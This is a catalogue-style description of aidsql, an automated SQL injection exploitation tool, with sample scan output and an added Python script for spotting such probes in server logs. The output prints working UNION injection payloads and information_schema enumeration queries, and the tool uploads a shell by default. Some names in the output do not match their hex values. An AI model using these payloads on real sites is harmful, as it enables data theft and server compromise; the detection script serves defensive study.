aidsql-en




aidsql

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Security application written in PHP that automates the identification and exploitation of SQL injection vulnerabilities.

Objective:

  • Automated detection of parameters vulnerable to SQL Injection.
  • Automated and configurable database data mining.
  • Automated shell upload in order to compromise the application server.

Features:

Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.

Operative mode: Active.

Automated detection of parameters vulnerable to SQL Injection.

  • Automated parameter tampering for both URL parameters (GET) and form data (POST).
  • Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
  • Provides the name of the parameter and URL from the detected vulnerabilities.

Automated and configurable database data mining.

  • Retrieves the following information:
    • Database user name.
    • Database name.
    • Database version.
    • Database tables.
    • Database table schemas: keys, field names and types.

Reports:
Output reports:

  • Merged report of the exploitation and data-mining results, in TXT and XML format.

    Basic usage:

    Perform an automated scan of a web application. The following command starts the scan:

    ./aidSQL --url=[URL] --no-shell


    Where:

    • --url: URL of the web application.
    • --no-shell: Disables shell upload.

    Note: By default the tool is configured to perform data mining and upload a shell as soon as it discovers a vulnerable parameter. Disabling the shell option is recommended to minimize the impact on the web application and/or application server.

    The tool begins by crawling the web application to build a site-map of the pages and parameters present.

    Normalized URL: http://midominio.com.mx/miaplicacion/

    Crawling ...

    Fetching content from http://midominio.com.mx/miaplicacion/

    200 OK

    TOTAL URL's found: 55

    Add file index.jsp ...

    Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html

    Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"

    Parsing previously crawled URL, looking for new parameters

    Adding new parameter "do"


    This site-map is then used to detect vulnerable parameters: predefined SQL injection payloads (UNION queries) are injected into each parameter and the web application's responses are analysed. The hex literals in the payloads below, 0x3c61696473716c3e and 0x3c2f61696473716c3e, decode to the marker tags <aidsql> and </aidsql>, which the tool can then look for in the response to confirm that the injected query executed.

    Testing links ...

    1. { http://midominio.com.mx/miaplicacion/index.jsp }

    Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp
    Set method GET …

    Load sqli => mysql5 ... OK

    Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome

    sql injection plugin...

    [1][ [message] | METHOD: unionQuery

    [QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*

    Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
    UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A
    [WW] WARNING: GOT 403

    [2][ message] | METHOD: unionQuery …


    During the scan, whenever a vulnerable parameter is detected, the data-mining module is invoked to extract information from the database (user, database name, tables and their columns, queried through information_schema).

    Site is vulnerable to sql injection!

    Skipping calling plugin's get shell method

    Fetching database user ...

    [message] | METHOD: unionQuery

    [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; --
    Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
    SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
    FOUND DATABASE seguridad
    [message] | METHOD: unionQuery

    [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
    (TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
    IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; --
    Normalized URL:
    http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
    UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
    TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
    TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
    Fetching table "cuentas" columns ...

    [message] | METHOD: unionQuery

    [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
    (COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5
    FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; --
    Normalized URL:
    http://midominio.com.mx/miaplicacion
    /index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
    UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
    COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
    FROM+information_schema.columns+
    WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php


    When the scan completes, the tool displays a summary of the vulnerabilities found and the scan duration.

    VULNERABLE LINKS FOUND : 1
    TOTAL TIME : 53 seconds
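    As an added example (not part of the aidsql project or the original page), the following Python script shows how a defender can recognise probes of the shape shown in the scan output above in a web server access log: it URL-decodes each request, matches UNION SELECT, information_schema and marker-tag indicators, and decodes the MySQL 0x... hex literals the payloads carry. The log lines are constructed in Common Log Format for this example and the indicator names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines for this example (not captured from a real server); the
# query strings mirror the shape of the UNION probes shown in the scan output above.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2024:10:00:00 +0000] "GET /miaplicacion/index.jsp?message=Welcome HTTP/1.1" 200 512
203.0.113.10 - - [01/Jan/2024:10:00:01 +0000] "GET /miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A HTTP/1.1" 403 221
203.0.113.10 - - [01/Jan/2024:10:00:02 +0000] "GET /miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+ HTTP/1.1" 200 1894
203.0.113.10 - - [01/Jan/2024:10:00:03 +0000] "GET /miaplicacion/index.jsp?message=x%27+UNION+ALL+SELECT+1%2CGROUP_CONCAT%28TABLE_NAME%29+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+ HTTP/1.1" 200 2310
"""

# Request line: path (with query string) and the HTTP status the server returned.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})")

# Indicators evaluated against the URL-decoded query string.
INDICATORS = [
    ("union_select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("aidsql_marker", re.compile(r"0x3c61696473716c3e", re.I)),  # hex of "<aidsql>"
    ("comment_terminator", re.compile(r"(?:--\s|/\*)\s*$")),
]

def decode_hex_literals(query):
    """Return the ASCII strings hidden in MySQL 0x... literals (marker tags, schema names)."""
    decoded = []
    for m in HEX_LITERAL_RE.finditer(query):
        try:
            decoded.append(bytes.fromhex(m.group(1)).decode("ascii"))
        except (ValueError, UnicodeDecodeError):  # odd length or non-ASCII bytes: skip
            continue
    return decoded

def analyze_line(line):
    """Return {'status', 'indicators', 'decoded'} for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return None
    query = unquote_plus(m.group(1).split("?", 1)[1])
    hits = [name for name, rx in INDICATORS if rx.search(query)]
    if not hits:
        return None
    return {"status": int(m.group(2)), "indicators": hits,
            "decoded": decode_hex_literals(query)}

def scan_log(text):
    """Return [(line_number, analysis)] for every line matching at least one indicator."""
    return [(n, a) for n, l in enumerate(text.splitlines(), 1) if (a := analyze_line(l))]
```

    A 403 on a probe request (as in the "[WW] WARNING: GOT 403" line above) means a filter rejected it; a 200 with a large response body on the information_schema probes is the pattern worth alerting on.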


    The tool automatically saves the exploitation and data-mining results inside its internal folder:

    • Folder /logs/[application name]
    • Log file - index.php_console.log
    • XML file - index.php_db_schemas.xml

    index.php_console.log file example:

    HOST midominio.com.mx ------------------------------------
    PLUGIN NAME : UNION
    PLUGIN AUTHOR : Juan Stange
    REQUEST VARIABLES : message, do, info, page,…
    VULNERABLE LINK : http://midominio.com.mx/miaplicacion
    /index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
    SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
    COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
    %29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
    table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+
    ------------------------------------------------
    SCHEMA seguridad
    ------------------------------------------------
    VERSION : 5.5.16
    DATADIR :

    TABLE cuentas
    ---------------------
    type : BASE TABLE
    engine : InnoDB
    collation : latin1_swedish_ci
    increment : 1

    COLUMNS
    ---------------------
    NAME : cid
    type int(11)
    key 0
    extra 0
    NAME : username


    index.php_db_schemas.xml file example:

    <schemas>
    <database name="owasp10" version="5.5.16" datadir="">
    <tables>
    <table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">
    <column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>
    <column name="username"><type>text</type><key>0</key><extra>0</extra></column>


    Resources:

    Link: http://code.google.com/p/aidsql/.
    Author(s): jpfstange
    LynxSec IT consulting and security.
    Contact: lynxsec [at] gmail.com
    IRC: irc.freenode.net #aidsql
    Twitter: http://twitter.com/#!aidsql
    License: GNU GPL v2

